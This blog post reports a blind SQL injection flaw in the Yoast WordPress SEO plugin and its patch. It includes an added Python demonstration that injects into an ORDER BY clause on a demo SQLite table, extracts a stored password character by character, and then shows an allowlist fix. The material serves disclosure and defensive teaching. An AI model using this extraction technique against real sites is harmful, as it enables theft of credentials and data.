Blind SQL Injection Vulnerability Found in WordPress SEO Plugin

A blind SQL injection vulnerability has been discovered in the popular WordPress SEO plugin by Yoast. An advisory was issued by the WPScan Vulnerability Database after responsibly disclosing the vulnerability to the plugin author:

The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.

The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.
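The advisory's point is that "not sufficiently sanitized" sort parameters are dangerous even when nothing is echoed back: an attacker who controls ORDER BY can make the page sort one way when a condition is true and another way when it is false, and read data out of the row order. The following is an added illustration, not code from the Yoast plugin or the WPScan advisory. It uses an in-memory SQLite table with constructed rows, a `list_posts_vulnerable()` builder that mirrors the anti-pattern (request-controlled `orderby`/`order` pasted into the query), a boolean-based blind extraction against it, and the allowlist fix that removes the signal. All names, tables and values are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for posts/users tables (not real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO posts (title) VALUES (?)",
                    [("alpha",), ("bravo",), ("charlie",)])
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                "user_login TEXT, user_pass TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")
    con.commit()
    return con


def list_posts_vulnerable(con, orderby, order):
    """Anti-pattern: request-controlled orderby/order pasted into the query."""
    sql = f"SELECT id FROM posts ORDER BY {orderby} {order}"
    return [row[0] for row in con.execute(sql)]


# ORDER BY targets cannot be bound as prepared-statement parameters, so the
# robust fix is an allowlist of column names and sort directions.
ALLOWED_ORDERBY = {"id", "title"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_posts_safe(con, orderby, order):
    """Hardened version: anything outside the allowlist falls back to a default."""
    orderby = orderby if orderby in ALLOWED_ORDERBY else "id"
    order = order.upper() if order.upper() in ALLOWED_ORDER else "ASC"
    sql = f"SELECT id FROM posts ORDER BY {orderby} {order}"
    return [row[0] for row in con.execute(sql)]


def oracle(con, list_fn, condition):
    """Boolean-based blind oracle: sort ascending when `condition` holds,
    descending otherwise, and read the answer from the resulting row order."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return list_fn(con, payload, "ASC") == [1, 2, 3]


def is_exploitable(con, list_fn):
    """The oracle only works if a true and a false condition sort differently."""
    return oracle(con, list_fn, "1=1") != oracle(con, list_fn, "1=2")


def extract_password(con, list_fn, max_len=32):
    """Recover users.user_pass one character at a time with a binary search
    over the ASCII range; each probe costs one sorted page load."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode('') is NULL in SQLite; ifnull maps "past the end" to 0.
            probe = (f"ifnull(unicode(substr((SELECT user_pass FROM users "
                     f"WHERE id = 1), {pos}, 1)), 0) > {mid}")
            if oracle(con, list_fn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # reached the end of the string
            break
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    db = make_db()
    print("vulnerable exploitable:", is_exploitable(db, list_posts_vulnerable))
    print("recovered:", extract_password(db, list_posts_vulnerable))
    print("hardened exploitable:", is_exploitable(db, list_posts_safe))
```

The same logic applies to a PHP plugin: `$wpdb->prepare()` cannot quote a column name or an `ASC`/`DESC` keyword, so escaping is not the fix; the sort column and direction must be checked against a fixed list of permitted values before they reach the query, and any other value must be replaced with a default rather than passed through.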

The latest version of WordPress SEO by Yoast (1.7.4) contains a patch for this vulnerability. The changelog reads: “fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor.”

We have scanned all websites with an active VaultPress plan and updated the WordPress SEO plugin to version 1.7.4 where necessary. If there are cases where we’re not able to update the affected plugin ourselves, we will e-mail the website owners to make sure they are aware of this.

If you use the WordPress SEO by Yoast plugin, we strongly recommend that you make sure you are on the latest version. You can update this plugin by visiting Dashboard > Updates in your WordPress dashboard, selecting WordPress SEO by Yoast, and clicking the Update Plugins button.

As always, drop us a line if you have any questions or need any help!

About Stefan

A happiness engineer and a human being.
This entry was posted in General, Security.
